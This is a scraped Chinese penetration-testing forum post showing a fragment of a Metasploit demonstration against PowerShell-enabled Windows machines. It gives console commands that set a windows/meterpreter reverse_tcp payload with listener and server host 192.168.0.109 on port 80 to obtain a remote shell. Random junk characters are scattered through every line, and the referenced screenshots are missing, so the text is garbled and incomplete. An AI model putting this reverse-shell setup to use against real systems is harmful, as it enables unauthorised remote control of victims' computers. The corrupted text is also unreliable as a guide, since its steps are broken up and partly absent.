! E% R% B6 R5 ?6 O& l 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ {9 \3 m/ u( z [* r4 o# Y
/ ~/ _; i$ f/ ?/ \* W
, I+ w* N8 ]* D" Q 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
/ c, M: E4 f* q) a' N set AllowPowershellPrompt true
* s0 V$ d: t% [0 l. x. J& g0 h: B, W2 w. w! s Set LHOST 192.168.0.109 A# F3 `1 | A5 S
1 f! }7 u- Z& h) [ [& `. V3 X* n set SRVHOST 192.168.0.109
1 o" d7 P+ \( a/ I3 A' M* C5 f0 O1 H: H3 g Set uripath share0 Y7 M$ p! g9 l! e3 D$ t9 y9 W
1 s3 p$ t/ i) e' ^; J( j! ~+ z* {6 c. A7 v1 T/ A$ W2 _: j Set srvport 80
. m4 ]# M5 p7 J/ P5 [5 {/ r9 [' O$ L: X" {8 O
( i1 Z0 j* F" M2 ^8 Y5 G* F) K 1 [2 s7 h' v p3 R, u: |" v) G7 `. y
6 t' g0 @# q9 l; b6 N / R$ Q/ D( _& z" u6 c7 \9 s
7 Y9 B0 L& X6 ]: u9 F+ p- V. I: `" ~9 B2 R# e% J
3 p- c3 N& ]$ ^( }7 v9 s! N$ ~- D0 \ : z1 L" U6 U" @9 Y' p
4 J5 z& a9 B6 }- E5 @1 F$ r 下面我们来访问本地地址如图:
% K8 Y6 q/ }+ m& {# c 8 @* t: d% S. D0 U# \! _: C
9 R% S& B1 T% o' D m8 x) K4 u6 `* { % s7 v8 j1 g' X4 t( L% g
6 h% s) e$ Y5 V: h' R5 E" P" T& J, k- G& R4 ]- [* w5 }2 c ?& P
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |